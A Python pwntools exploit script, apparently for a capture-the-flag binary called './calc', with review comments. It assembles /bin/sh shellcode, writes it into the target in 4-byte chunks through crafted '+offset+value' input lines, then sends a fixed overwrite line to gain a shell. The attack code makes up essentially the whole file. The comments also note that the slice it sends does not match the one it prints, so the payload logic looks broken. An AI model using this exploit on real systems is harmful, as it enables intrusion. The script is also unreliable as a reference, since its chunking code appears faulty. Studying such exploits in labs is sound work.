#!/usr/bin/env python3
# Proof-of-concept interaction script for a local binary "./calc", driven with
# pwntools.  It assembles a shell payload, writes it into the target in 4-byte
# chunks as "+<offset>+<value>" lines, then sends one fixed line and prints
# whatever the process replies.  The constants (361, 360, 135151459) are
# specific to this binary and cannot be derived from this file alone.
#
# NOTE(review): the listing this was taken from lost its indentation; the two
# lines after the `for` are assumed to be the loop body (both use exec_num),
# and the fixed "+360+..." line is assumed to be sent once after the loop.
from pwn import *

# Let pwntools pick up architecture/word size from the target binary
# (presumably used by asm() below — confirm against the pwntools version in use).
context.binary = './calc'

# Assemble pwntools' stock execve("/bin/sh") shellcode for the current context.
shellcode = asm(shellcraft.sh())

# Despite the name, `pid` is a pwntools process tube, not an OS pid.
pid = process("./calc")

# Debug output only: payload bytes and the active pwntools context.
print(shellcode.hex())
print(context)

shellen = len(shellcode)

# Walk the offsets from (361 + len/4 - 1) down to 361, one 4-byte chunk per line.
# int(len / 4) truncates, so a payload whose length is not a multiple of 4
# leaves its remainder bytes out of the chunk count.
for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))):
    # NOTE(review): the slice sent here, [(exec_num+1)*1 : exec_num*4], is not
    # the slice printed on the next line; for exec_num == 0 it is [1:0], i.e.
    # empty, and int.from_bytes(b'', 'big') is 0.  Whether the sent value or
    # the printed value is the intended one cannot be settled from this file.
    # sendline() is given a str, not bytes — assumes a pwntools version that
    # accepts/encodes str payloads; confirm.
    pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big')))
    # Echo of what was (apparently) meant to be sent: the 4-byte chunk taken
    # from the end of the payload, big-endian.
    print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big')))

# One fixed line after the chunks.  135151459 is a binary-specific constant;
# its meaning is not documented here.
pid.sendline("+360+135151459")
print("+360+135151459")

# Interactive session is disabled; only a single recv() is printed.
#pid.interactive()
# recv() has no explicit timeout here; it returns whatever the process has
# sent so far (or blocks until something arrives, per pwntools defaults).
print(pid.recv())